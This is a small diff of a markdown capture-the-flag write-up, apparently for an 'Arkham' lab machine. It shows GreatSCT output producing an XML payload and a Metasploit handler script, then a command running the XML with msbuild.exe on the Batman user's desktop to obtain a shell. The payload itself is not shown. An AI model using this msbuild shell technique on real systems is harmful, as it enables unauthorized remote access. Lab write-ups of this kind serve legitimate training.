740i/Writeups/arkham/arkham.md

  [*] Source code written to: /usr/share/greatsct-output/source/740i.xml
  [*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/740i.rc
 ```
-This gives us an .rc script to run for the handler and a .xml file we copy to the Batman desktop and execute with msbuild.exe.
+This gives us an .rc script for the handler and a .xml file we copy to the Batman desktop and execute with msbuild.exe.
 It hangs and sends a shell.
 ```cmd
 C:\Users\Batman\Desktop>C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe 740i.xml
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe 740i.xml